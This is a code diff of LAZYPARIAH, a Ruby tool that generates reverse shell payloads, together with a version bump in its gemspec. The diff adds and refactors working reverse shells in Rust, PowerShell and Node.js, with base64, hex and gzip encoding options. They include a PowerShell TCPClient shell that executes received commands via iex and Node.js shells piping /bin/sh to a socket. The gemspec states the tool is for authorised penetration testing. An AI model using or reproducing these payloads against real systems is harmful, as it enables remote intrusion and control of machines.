 				File.open(temp_dir+"/rs", "r") do |f|
 					binary_payload = f.read()
-					case selected_payload
-					when "c_binary"
-						print_output(binary_payload, new_line=false)
-					when "c_binary_b64"
+					if b64_payload
+						# Base-64-encoded c_binary payload.
 						binary_payload_b64 = Base64.strict_encode64(binary_payload)
-						print_output(binary_payload_b64, url_encode=url_encode, new_line=!arguments[:"no-new-line"])
-					when "c_binary_hex"
+						print_output(s: binary_payload_b64, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+					elsif hex_payload
+						# Hex-encoded c_binary payload.
 						binary_payload_hex = binary_payload.unpack("H*")[0]
-						print_output(binary_payload_hex, new_line=!arguments[:"no-new-line"])
-					when "c_binary_gzip"
+						print_output(s: binary_payload_hex, new_line: !arguments[:"no-new-line"])
+					elsif gzip_payload
+						# Zlib-compressed c_binary payload.
 						sio = StringIO.new()
 						sio.binmode()
 						gz = Zlib::GzipWriter.new(sio)
 						gz.write(binary_payload)
 						gz.close()
 						binary_payload_gzip = sio.string
-						print_output(binary_payload_gzip, new_line=false)
-					when "c_binary_gzip_b64"
+						print_output(s: binary_payload_gzip, new_line: false)
+					elsif gzip_b64_payload
+						# Zlib-compressed and base-64-encoded c_binary payload.
 						sio = StringIO.new()
 						sio.binmode()
 						gz = Zlib::GzipWriter.new(sio)
@@ -333,21 +450,26 @@ begin
 						gz.close()
 						binary_payload_gzip = sio.string
 						binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
-						print_output(binary_payload_gzip_b64, url_encode=url_encode, new_line=!arguments[:"no-new-line"])
-					when "c_binary_gzip_hex"
+						print_output(s: binary_payload_gzip_b64, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+					elsif gzip_hex_payload
+						# Zlib-compressed and hex-encoded c_binary payload.
 						sio = StringIO.new()
 						sio.binmode()
 						gz = Zlib::GzipWriter.new(sio)
-						gz.write(binary_payload, new_line=!arguments[:"no-new-line"])
+						gz.write(binary_payload)
 						gz.close()
 						binary_payload_gzip = sio.string
 						binary_payload_gzip_hex = binary_payload_gzip.unpack("H*")[0]
-						print_output(binary_payload_gzip_hex)
+						print_output(s: binary_payload_gzip_hex, new_line: !arguments[:"no-new-line"])
+					else
+						# Standard c_binary payload.
+						print_output(s: binary_payload, new_line: false)
 					end
 				end
 
 				system("rm -r #{temp_dir}")
-			when "rust_binary", "rust_binary_gzip", "rust_binary_b64", "rust_binary_gzip_b64", "rust_binary_hex", "rust_binary_gzip_hex"
+			when "rust_binary"
+				# Rust binary reverse shells (compiled on the fly).
 				code = "use std::net::TcpStream;use std::os::unix::io::{AsRawFd, FromRawFd};use std::process::{Command, Stdio};fn main() {let lhost: &str = \"#{ARGV[1]}\";let lport: &str = \"#{ARGV[2]}\";let tcp_stream = TcpStream::connect(format!(\"{}:{}\", lhost, lport)).unwrap();let fd = tcp_stream.as_raw_fd();Command::new(\"/bin/sh\").arg(\"-i\").stdin(unsafe {Stdio::from_raw_fd(fd)}).stdout(unsafe {Stdio::from_raw_fd(fd)}).stderr(unsafe {Stdio::from_raw_fd(fd)}).spawn().unwrap().wait().unwrap();}"
 
 				temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
@@ -357,24 +479,25 @@ begin
 
 				File.open(temp_dir+"/rs", "r") do |f|
 					binary_payload = f.read()
-					case selected_payload
-					when "rust_binary"
-						print_output(binary_payload, new_line=false)
-					when "rust_binary_b64"
+					if b64_payload
+						# Base-64-encoded rust_binary payload.
 						binary_payload_b64 = Base64.strict_encode64(binary_payload)
-						print_output(binary_payload_b64, url_encode=url_encode, new_line=!arguments[:"no-new-line"])
-					when "rust_binary_hex"
+						print_output(s: binary_payload_b64, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+					elsif hex_payload
+						# Hex-encoded rust_binary payload.
 						binary_payload_hex = binary_payload.unpack("H*")[0]
-						print_output(binary_payload_hex, new_line=!arguments[:"no-new-line"])
-					when "rust_binary_gzip"
+						print_output(s: binary_payload_hex, new_line: !arguments[:"no-new-line"])
+					elsif gzip_payload
+						# Zlib-compressed rust_binary payload.
 						sio = StringIO.new()
 						sio.binmode()
 						gz = Zlib::GzipWriter.new(sio)
 						gz.write(binary_payload)
 						gz.close()
 						binary_payload_gzip = sio.string
-						print_output(binary_payload_gzip, new_line=false)
-					when "rust_binary_gzip_b64"
+						print_output(s: binary_payload_gzip, new_line: false)
+					elsif gzip_b64_payload
+						# Zlib-compressed and base-64-encoded rust_binary payload.
 						sio = StringIO.new()
 						sio.binmode()
 						gz = Zlib::GzipWriter.new(sio)
@@ -382,20 +505,49 @@ begin
 						gz.close()
 						binary_payload_gzip = sio.string
 						binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
-						print_output(binary_payload_gzip_b64, url_encode=url_encode, new_line=!arguments[:"no-new-line"])
-					when "rust_binary_gzip_hex"
+						print_output(s: binary_payload_gzip_b64, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+					elsif gzip_hex_payload
+						# Zlib-compressed and hex-encoded rust_binary payload.
 						sio = StringIO.new()
 						sio.binmode()
 						gz = Zlib::GzipWriter.new(sio)
-						gz.write(binary_payload, new_line=!arguments[:"no-new-line"])
+						gz.write(binary_payload)
 						gz.close()
 						binary_payload_gzip = sio.string
 						binary_payload_gzip_hex = binary_payload_gzip.unpack("H*")[0]
-						print_output(binary_payload_gzip_hex)
+						print_output(s: binary_payload_gzip_hex, new_line: !arguments[:"no-new-line"])
+					else
+						# Standard rust_binary payload.
+						print_output(s: binary_payload, new_line: false)
 					end
 				end
 
 				system("rm -r #{temp_dir}")
+			when "powershell_c"
+				# Simple reverse shell in Powershell.
+				code = "$client = New-Object System.Net.Sockets.TCPClient('#{ARGV[1]}',#{ARGV[2]});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
+				command = "powershell -nop -c \"#{code}\""
+				print_output(s: command, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "powershell_b64"
+				# Simple base64-encoded reverse shell in Powershell.
+				code = "$client = New-Object System.Net.Sockets.TCPClient('#{ARGV[1]}',#{ARGV[2]});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()".encode("utf-16le")
+				command = "powershell -e #{Base64.strict_encode64(code)}"
+				print_output(s: command, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "nodejs"
+				code = "(function(){var net = require('net'), cp = require('child_process'), sh = cp.spawn('/bin/sh', []);var client = new net.Socket();client.connect(#{ARGV[2]}, '#{ARGV[1]}', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();"
+				print_output(s: code, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "nodejs_c"
+				code = "(function(){var net = require('net'), cp = require('child_process'), sh = cp.spawn('/bin/sh', []);var client = new net.Socket();client.connect(#{ARGV[2]}, '#{ARGV[1]}', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();"
+				command = "echo \"#{code}\" | node"
+				print_output(s: command, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "nodejs_b64"
+				code = "(function(){var net = require('net'), cp = require('child_process'), sh = cp.spawn('/bin/sh', []);var client = new net.Socket();client.connect(#{ARGV[2]}, '#{ARGV[1]}', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();"
+				command = "echo #{Base64.strict_encode64(code)} | base64 -d | node"
+				print_output(s: command, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
+			when "nodejs_hex"
+				code = "(function(){var net = require('net'), cp = require('child_process'), sh = cp.spawn('/bin/sh', []);var client = new net.Socket();client.connect(#{ARGV[2]}, '#{ARGV[1]}', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();".unpack("H*")[0]
+				command = "echo #{code} | xxd -p -r - | node"
+				print_output(s: command, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
 			end
 		end
 	end

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: lazypariah
 version: !ruby/object:Gem::Version
-  version: 1.2.1
+  version: 1.6.0
 platform: ruby
 authors:
 - Peter Funnell
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2021-03-21 00:00:00.000000000 Z
+date: 2022-01-11 00:00:00.000000000 Z
 dependencies: []
 description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
   on the fly. It is intended to be used only in authorised circumstances by qualified